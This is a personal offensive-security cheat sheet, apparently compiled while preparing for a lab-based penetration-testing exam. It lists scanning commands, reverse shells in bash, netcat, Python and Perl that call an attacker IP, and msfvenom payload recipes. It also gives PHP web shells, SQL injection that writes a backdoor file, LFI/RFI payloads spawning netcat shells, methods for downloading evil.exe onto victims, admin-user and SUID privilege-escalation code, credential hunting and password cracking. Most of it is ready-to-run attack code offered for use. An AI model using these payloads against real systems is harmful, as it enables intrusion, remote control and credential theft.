Useful Payload-2

Some Useful Payloads.

For Taking Notes-

One Note
keep pass
Preparation though-
HackTheBox
VulnHub
IppSec

Vulnerable Machines-

Kioptrix: Level 1
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

 Kioptrix: Level 1.1
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

 Kioptrix: Level 1.2
https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

 Kioptrix: Level 1.3
https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

 FristiLeaks: 1.3
https://www.vulnhub.com/entry/fristileaks-13,133/

 Stapler: 1
https://www.vulnhub.com/entry/stapler-1,150/

 Brainpan: 1
https://www.vulnhub.com/entry/brainpan-1,51/

 VulnOS: 2
https://www.vulnhub.com/entry/vulnos-2,147/

 SickOs: 1.2
https://www.vulnhub.com/entry/sickos-12,144/

 pWnOS: 2.0

https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ 

Enumeration-

Nmap
Quick TCP Scan
nmap -sC -sV -vv -oA quick 10.10.10.10
Quick UDP Scan
nmap -sU -sV -vv -oA quick_udp 10.10.10.10
Full TCP Scan
nmap -sC -sV -p- -vv -oA full 10.10.10.10
Port knock
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.10.10.10; done
Web Scanning
Gobuster quick directory busting
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
Gobuster comprehensive directory busting
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
Gobuster search with file extension
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
Nikto web server scan
nikto -h 10.10.10.10
Wordpress scan
wpscan -u 10.10.10.10/wp/
Port Checking
Netcat banner grab
nc -v 10.10.10.10 port
Telnet banner grab
telnet 10.10.10.10 port
SMB
SMB Vulnerability Scan
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10
SMB Users & Shares Scan
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
Enum4linux
enum4linux -a 10.10.10.10
Null connect
rpcclient -U "" 10.10.10.10
Connect to SMB share
smbclient //MOUNT/share
SNMP
SNMP enumeration
snmp-check 10.10.10.10

Commands This section will include commands / code I used in the lab environment that I found useful

Python Servers
Web Server
python -m SimpleHTTPServer 80
FTP Server
# Install pyftpdlib
pip install pyftpdlib

# Run (-w flag allows anonymous write access)
python -m pyftpdlib -p 21 -w
Reverse Shells
Bash shell
bash -i >& /dev/tcp/10.10.10.10/4443 0>&1
Netcat without -e flag
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
Netcat Linux
nc -e /bin/sh 10.10.10.10 4443
Netcat Windows
nc -e cmd.exe 10.10.10.10 4443
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
perl -e 'use Socket;$i="10.10.10.10";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Remote Desktop
Remote Desktop for windows with share and 85% screen
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10
PHP
PHP command injection from GET Request
<?php echo system($_GET["cmd"]);?>

#Alternative
<?php echo shell_exec($_GET["cmd"]);?>
Powershell
Non-interactive execute powershell file
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
Misc
More binaries Path
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/ucb/
Linux proof
hostname && whoami && cat proof.txt && /sbin/ifconfig
Windows proof
hostname && whoami.exe && type proof.txt && ipconfig /all
SSH Tunneling / Pivoting
sshuttle
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
Local port forwarding
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote port forwarding
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic port forwarding
ssh -D <local proxy port> -p <remote port> <target>
Plink local port forwarding
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
SQL Injection
# sqlmap crawl  
sqlmap -u http://10.10.10.10 --crawl=1

# sqlmap dump database  
sqlmap -u http://10.10.10.10 --dbms=mysql --dump

# sqlmap shell  
sqlmap -u http://10.10.10.10 --dbms=mysql --os-shell
Upload php command injection file
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
Load file
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
Bypasses
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -
Brute force
John the Ripper shadow file
$ unshadow passwd shadow > unshadow.db
$ john unshadow.db

# Hashcat SHA512 $6$ shadow file  
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

#Hashcat MD5 $1$ shadow file  
hashcat -m 500 -a 0 hash.txt rockyou.txt --username

# Hashcat MD5 Apache webdav file  
hashcat -m 1600 -a 0 hash.txt rockyou.txt

# Hashcat SHA1  
hashcat -m 100 -a 0 hash.txt rockyou.txt --force

# Hashcat Wordpress  
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
RDP user with password list
ncrack -vv --user offsec -P passwords rdp://10.10.10.10
SSH user with password list
hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22
FTP user with password list
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
MSFVenom Payloads
# PHP reverse shell  
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php

# Java WAR reverse shell  
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

# Linux bind shell  
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

# Linux FreeBSD reverse shell  
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf

# Linux C reverse shell  
msfvenom  -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c

# Windows non staged reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

# Windows Staged (Meterpreter) reverse shell  
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

# Windows Python reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py

# Windows ASP reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp

# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx

# Windows JavaScript reverse shell with nops  
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18

# Windows Powershell reverse shell  
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

# Windows reverse shell excluding bad characters  
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

# Windows x64 bit reverse shell  
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe

# Windows reverse shell embedded into plink  
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Interactive Shell

Upgrading to a fully interactive TTY using Python
# Enter while in reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'

Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

File Transfers

HTTP
The most common file transfer method.
# In Kali
python -m SimpleHTTPServer 80

# In reverse shell - Linux
wget 10.10.10.10/file

# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
FTP
This process can be mundane, a quick tip would be to be to name the filename as ‘file’ on your kali machine so that you don’t have to re-write the script multiple names, you can then rename the file on windows.
# In Kali
python -m pyftpdlib -p 21 -w

# In reverse shell
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt 
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

# Execute
ftp -v -n -s:ftp.txt
TFTP
Generic.
# In Kali
atftpd --daemon --port 69 /tftp

# In reverse shell
tftp -i 10.10.10.10 GET nc.exe
VBS
When FTP/TFTP fails you, this wget script in VBS was the go to on Windows machines.
# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe

Buffer Overflow

Offensive Security did a fantastic job in explaining Buffer Overflows, It is hard at first but the more you do it the better you understand. I had re-read the buffer overflow section multiple times and ensured I knew how to do it with my eyes closed in preparation for the exam. Triple check the bad characters, don’t just look at the structure and actually step through each character one by one would be the best advice for the exam.
# Payload
payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length>

# Pattern create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>

# Pattern offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <length> -q <address>

# nasm
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp eax

# Bad characters
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

Privilege Escalation

There is basically two blog posts that are treated as the privilege escalation bible, g0tmi1k’s post for Linux & fuzzysecurity’s post for Windows.
Offensive Security was able to provide a balance in the labs, there was definitely unique privilege escalate methods however there was also a lot of kernel exploits. I had developed a habit to searchsploit everything, with or without a version number, don’t just skim..actually read them and understand how they work, there was countless times I had tried an exploit which failed and moved on only to realise it was the correct exploit but needed a slight tweak.
The devil is in the details, I was definitely guilty of skimming and missing the crucial details such as read and write permissions to /etc/passwd or sticky bit.
I had used three different scripts: LinuxPrivCheckerLinEnum, and PowerUp. It is important to remember that these scripts did not always find everything and manually searching for files is also required.
Kernel exploits were a bit of a hit and miss, machines are sometimes vulnerable many different ways..I always thought using a kernel exploit was a bit like cheating, especially dirtyc0w which is never the intended way. There is 2 github posts that contain pre-compiled exploits that I found usefull, they are: abatchy17’s Windows Exploits & lucyoa’s kernel exploits.
Links
Privilege Escalation:
Kernel Exploits:
Scripts:

Scripts

useradd.c
Windows - Add user.
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main ()
{
  int i;
  i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
  return 0;
}

# Compile
i686-w64-mingw32-gcc -o useradd.exe useradd.c
SUID
Set owner user ID.
int main(void){
  setresuid(0, 0, 0);
  system("/bin/bash");
}

# Compile
gcc suid.c -o suid
Powershell Run as
Run file as another user with powershell.
echo $username = '<username>' > runas.ps1
echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1
Process Monitor
Monitor processes to check for running cron jobs.
#!/bin/bash

# Loop by line
IFS=$'\n'

old_process=$(ps -eo command)

while true; do
 new_process=$(ps -eo command)
 diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
 sleep 1
 old_process=$new_process
done

1-Directory-BruteForcing-

gobuster -w ../../../usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.109/sparklays/design/ -x html,php

dirbuster -u http://10.10.10.109/sparklays/ -l ../../../usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

dirb http://10.10.10.109/sparklays/design/ cewlout -X .html,.php

cewl -w cewlout http://10.10.10.109

Then we’ll use john to transform each word in the wordlist according to the rules in /etc/john/john.conf.

john --wordlist=cewlout --rules --stdout > cewlupdatedout.cewl

2-Enumeration
Filtered / bypass firewall

nmap -A -T5 ip

nmap -g 80 -sV ip //incase inbound traffic is allowed to port 80 only.

nmap --script=firewall-bypass ip

3-File-Transfer
curl , wget to download files.

in order to not lose the limited shell, we will make the session non interactive.

TFTP is a UDP based file transfer. xp to 2003 contain this bydefault.
7 above, need to be installed while windows installation.
tftp is non interactive.

setup tftp server on kali machine/attacker machine
atftpd --daemon --port 69 /tftp    #tftp directory is the server directory
cp /usr/share/windows-binaries/nc.exe /tftp/
 on victim machin
 tftp -i <tftpserverip> GET nc.exe  //will download from tftp server


 FTP 
 windows ftp is interactive program.
 ftp /?
 ftp -s:filename (non interactive way to download commands)
apt-get isntall pure-ftpd //ftp server
create file setup-ftp
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw usereadd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
make a list of commands file
echo open 192.168.30.5 21> ftp.txt
echo offsec>>ftp.txt
echo lab>> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
on victim machine:
copy and paste these commands so all commands will run automatically and exit.
VBS script for xp and 2003 windows and powershell for 7,8 and above:
below is http downloader script to be pasted in command line on target system.(its non interactive)
echo,strUrl,=,WScript.Arguments.Item(0),>,wget.vbs,
echo,StrFile,=,WScript.Arguments.Item(1),>>,wget.vbs,
echo,Const,HTTPREQUEST_PROXYSETTING_DEFAULT,=,0,>>,wget.vbs,
echo,Const,HTTPREQUEST_PROXYSETTING_PRECONFIG,=,0,>>,wget.vbs,
echo,Const,HTTPREQUEST_PROXYSETTING_DIRECT,=,1,>>,wget.vbs,
echo,Const,HTTPREQUEST_PROXYSETTING_PROXY,=,2,>>,wget.vbs,
echo,Dim,http,,varByteArray,,strData,,strBuffer,,lngCounter,,fs,,ts,>>,wget.vbs,
echo,,Err.Clear,>>,wget.vbs,
echo,,Set,http,=,Nothing,>>,wget.vbs,
echo,,Set,http,=,CreateObject("WinHttp.WinHttpRequest.5.1"),>>,wget.vbs,
echo,,If,http,Is,Nothing,Then,Set,http,=,CreateObject("WinHttp.WinHttpRequest"),>>,wget.vbs,
echo,,If,http,Is,Nothing,Then,Set,http,=,CreateObject("MSXML2.ServerXMLHTTP"),>>,wget.vbs,
echo,,If,http,Is,Nothing,Then,Set,http,=,CreateObject("Microsoft.XMLHTTP"),>>,wget.vbs,
echo,,http.Open,"GET",,strURL,,False,>>,wget.vbs,
echo,,http.Send,>>,wget.vbs,
echo,,varByteArray,=,http.ResponseBody,>>,wget.vbs,
echo,,Set,http,=,Nothing,>>,wget.vbs,
echo,,Set,fs,=,CreateObject("Scripting.FileSystemObject"),>>,wget.vbs,
echo,,Set,ts,=,fs.CreateTextFile(StrFile,,True),>>,wget.vbs,
echo,,strData,=,"",>>,wget.vbs,
echo,,strBuffer,=,"",>>,wget.vbs,
echo,,For,lngCounter,=,0,to,UBound(varByteArray),>>,wget.vbs,
echo,,ts.Write,Chr(255,And,Ascb(Midb(varByteArray,lngCounter,+,1,,1))),>>,wget.vbs,
echo,,Next,>>,wget.vbs,
echo,,ts.Close,>>,wget.vbs,
cscript+wget.vbs+http://192.168.10.5/evil.exe+evil.exe, (on victim machine,download from host location)
POWERSHELL
powersploit and nishang
echo+$storageDir+=+$pwd+>+wget.ps1,
echo+$webclient+=+New5Object+System.Net.WebClient+>>wget.ps1,
echo+$url+=+"http://192.168.10.5/evil.exe"+>>wget.ps1+
echo+$file+=+"new5exploit.exe"+>>wget.ps1+
echo+$webclient.DownloadFile($url,$file)+>>wget.ps1
powershell.exe+5ExecutionPolicy+Bypass+5NoLogo+5
NonInteractive+5NoProfile+5File+wget.ps1
file transfer via debug.exe
it is an assembler,disassemble and hexdumping tool.
file size limit is 64k
cp /usr/share/windows-binaries/nc.exe /var/www
ls -l nc.exe
upx -9 nc.exe (compression tool to reduce the size further)
wine exe2bat.exe nc.exe nc.txt (exe2bat will convert an exe into its txt file for file transfer)
copy all text from nc.txt and paste it in the victim command prompt
python -m SimpleHTTPServer 1337

4-LFI-RFI
Search for port 80 or any port running web server
If login page, bypass using sql injection, then hunt for LFI in pages
http://vulnerable_host/preview.php?file=../../../../etc/passwd 
==================== 
Useful shells:
<? system('uname -a');?>  
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
shell.php?e=whoami
shell.php?e=pwd
shell.php?e=uname%20-a (I had to URL encode the spaces otherwise my browser thought it should search using google)
shell.php?e=echo%20This%20site%20has%20been%20hacked%3Eindex.html
shell?e=ls%20-l%20/tmp
Null Byte Techniques
vuln.php?page=/etc/passwd 
vuln.php?page=/etc/passwd%2500  
http://vulnerable_host/preview.php?file=../../../../etc/passwd
http://vulnerable_host/preview.php?file=../../../../etc/passwdjpg
==========================
in documents folder, a python file is created to look for important windows files.
passthru("nc -e /bin/sh <attackerip> <attackerport>");
<?passthru("nc -e /bin/sh <attackerip> <attackerport>");?>
<?passthru(base64_decode("#base64 encoded command > nc -e /bin/sh <attackerip> <attackerport>"));?>
ssh "<?passthru(base64_decode("#base64 encoded command > nc -e /bin/sh <attackerip> <attackerport>"));?>
method1 = run php code through useragent header via burpsuite.
method2 = add a php code in the log files, /var/log/auth.log or mail log and send the php code through a bad ssh request ,using username as placeholder for php code. or through mail logs by sending an email.
/proc/self/environ
#This will read the useragent data for shell.
/etc/passwd
#users on the systems info
/windows/win.ini
Linux file locations:
– /etc/issue
– /proc/version
– /etc/profile
– /etc/passwd
– /etc/passwd
– /etc/shadow
– /root/.bash_history
– /var/log/dmessage
– /var/mail/root
– /var/spool/cron/crontabs/root
Windows File Locations:
– %SYSTEMROOT%repairsystem
– %SYSTEMROOT%repairSAM
– %SYSTEMROOT%repairSAM
– %WINDIR%win.ini
– %SYSTEMDRIVE%boot.ini
– %WINDIR%Panthersysprep.inf
– %WINDIR%system32configAppEvent.Evt
[/vc_tta_section]
OS/X macOS File Locations:
– /etc/fstab
– /etc/master.passwd
– /etc/resolv.conf
– /etc/sudoers
– /etc/sysctl.conf
----------------------------------------------------------------
Remote File Inclusion:
make a .txt file
<?php
passthru("nc -e /bin/sh attackerip attackerport");
?>
make the file accessible to victim
in victim machine type:
?page=http://attackerip/reverse.txt?
//question mark make it run on victim as php.
5-RPC Enumeration
showmount -e <IP>
//will show which users are on the system.
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.78.148
//will show which user recently logged in
for i in $(cat users);do finger $i $i@192.168.78.148;done
//useradd with id 2008
useradd vulnix –u 2008
/etc/exports file has no_root_squash option
cp /bin/bash localshell
chmod 4777 localshell
localshell -p

6-shell-upgrade
socat:
On Kali (listen):
socat file:'tty',raw,echo=0 tcp-listen:4444  
On Victim (launch):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444  
standalone binaries
https://github.com/andrew-d/static-binaries
command injection:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444  
download to writable directory , chmod it and execute it.
-------------------------------------------------------------------------------------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z (will background the current connection)
#here we can also check <echo $TERM> to see the xterm-256 color response.
#we can also do <stty -a> for options.
stty raw -echo (to enable printing the keys as they are pressed)
fg (to bring back the shell to foreground)
reset (to fix the formatting and reinitialize the terminal)
export TERM=xterm (to enable clear screen option)
7-SQL Injection
Manual SQL injection discovery Tips,Examples,Cheat Sheet :-
https://gerbenjavado.com/manual-sql-injection-discovery-tips/
https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/
https://www.guru99.com/learn-sql-injection-with-practical-example.html
https://www.veracode.com/security/sql-injection
https://tipstrickshack.blogspot.com/2012/11/how-to-do-sql-injection-manually_7948.html
https://www.hackingloops.com/web-application-penetration-testing-manual-sql-injection/
https://www.cybrary.it/0p3n/howto-manually-sql-injection-using-union-select-method-guide/
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
https://portswigger.net/web-security/sql-injection/cheat-sheet
8-ssh
https://vimeo.com/54505525
the black magic of ssh
ssh -R *:8080:cort.local:4567 sshtalk.in
or
local = "Cort.local.4567"
remote= "*:8080"
ssh -R ${remote}:${local} sshtalk.in
----------------------------------------------------------------------
local port forwarding:
accessing target webserver via proxy machine:
ssh -L <attackerport>:<targetmachineip>:<targetmachineport> ssh@proxyserver
ssh -L 1337:192.168.100.42:80 msfadmin@192.168.100.45
accessing target remote desktop via proxy machine:
ssh -L <attackerport>:<targetsystemip>:<targetsystemport> ssh@proxy
ssh -L 1337:192.168.100.42:3389 msfadmin@192.168.100.45
rdesktop localhost:1337
---------------------------------------------------
local = "localhost:1234"
remote= "private-host:443"
ssh -L ${local}:${remote} public-host
------------------------------------------------------
#firesheeping
//in authorized public key file , we can set a type of shell or command for ssh session.
~/.ssh/authorized_keys:
command="echo \"Your tried to run ${SSH_ORIGINAL_COMMAND}\" ssh=rsa AAAAB@#RDASFSAF#ERASDFdsafdsafsdafdsaf423fs3rs4ats9fhsd9fhsd98fsd9f8u8usd9f8sddsifsdfdFOSDIF0SA9DFJA00sjfs90dfj0safJ09SJDG0A-s09fjsd0f9jsdf09dsjfsdifjsdlbKL
private key must not be readable to others.... #chmod 600 private key file
public key must only be readable and not writabel to others... #chmod 644 public key file.
plink.exe is a windows program to create tunnel via ssh (ssh client for windows)
netstat -an|find “LISTEN” //will list all listening ports
plink -l root -pw ubersecretpassword <attackingmachineip> _R 3390:127.0.0.1:3389
#this will connect 3389 port of victime machine to 3390 port of attacking machine. This command will be run on victim machine.
#we can check the tunnel activated by netstat -antp|grep listen
#there port 3390 will be seen as listening.
we will now connect rdesktop to localhost:3390 to get a rdp session to victime machine.
ssh -D 8080 username@dmzserverip
//this will route all traffic of 8080 to dmzserver
//on attacker machine
 configuring proxychains /etc/proxychains.conf
 add socks4 127.0.0.1 8080
proxychains nmap -p 3389 -sT -Pn 172.16.40.10-22 --open
//searching internal hidden network for a rdp service on any system.
proxychains rdesktop 172.16.40.20

9-Windows Privilege Escalation
https://lolbas-project.github.io/#
https://guif.re/windowseop
icacls /?
takeown /?
check for missing patches
c:\> wmic qfe Caption,Description,HotFixID,InstalledOn
check for exploits in exploit-db
searchsploit MS16 windows local //from kali
Browser Credentials (enum_ie,enum_chrome,etc.) (metasploit)
Sessiongopher - find stored credentials for putty,winscp,rdp,creds(fireeye)
Hot Potato (foxglovesec)
NBNS spoof,fake WPAD proxy,HTTP>NTLM Relay
PowerUp (@harmj0y)
find hijackable dll, unattended install files,modifiable services,unquoted service paths, AlwaysInstallElevated and more
---------------------------------------------------------------
PowerUp :
>windows>>
net localgroup administrators
powershell.exe -exec bypass
Import-Module ./PowerUp.ps1
Invoke-AllChecks
Write-UserAddMSI //it will add a useradd msi file, that can be run to make new user
--------------------------------------------------------------------------------------------------------------------------
Port 88 - Kerberos
Kerberos is a protocol that is used for network authentication. Different versions are used by *nix and Windows. But if you see a machine with port 88 open you can be fairly certain that it is a Windows Domain Controller.
If you already have a login to a user of that domain you might be able to escalate that privilege.
Check out: MS14-068
--------------------------------------------------------------------------------------------------------------------------Connectin with PSExec
If you have credentials you can use psexec you easily log in. You can either use the standalone binary or the metasploit module.
use exploit/windows/smb/psexec
-------------------------------------------------------------------------------------------------------------------------unquoted service path
wmic service get name,pathname,startmode
startmode = auto,manual , /i is not sensitive , /v is not included
wmic service get name,pathname,startmode|findstr /i /v “c:\Windows”|findstr /i /v “”"
------------------------------------------------------------------------------
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*
# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*
----------------------------------------------------------------------------------
https://guif.re/windowseop

DIOS (Dump In One Shot) Collection
################AZZATSSINS CYBERSERKERS ################

 concat_ws('<br>','AZZATSSINS',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database())))

 (select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.schemata)%20where%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,schema_name))))x)

 (select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.tables)%20where%20(table_schema=database())%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,table_name))))x)

 concat(@c:=0x00,if((select%20count(*)%20from%20information_schema.columns%20where%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c)

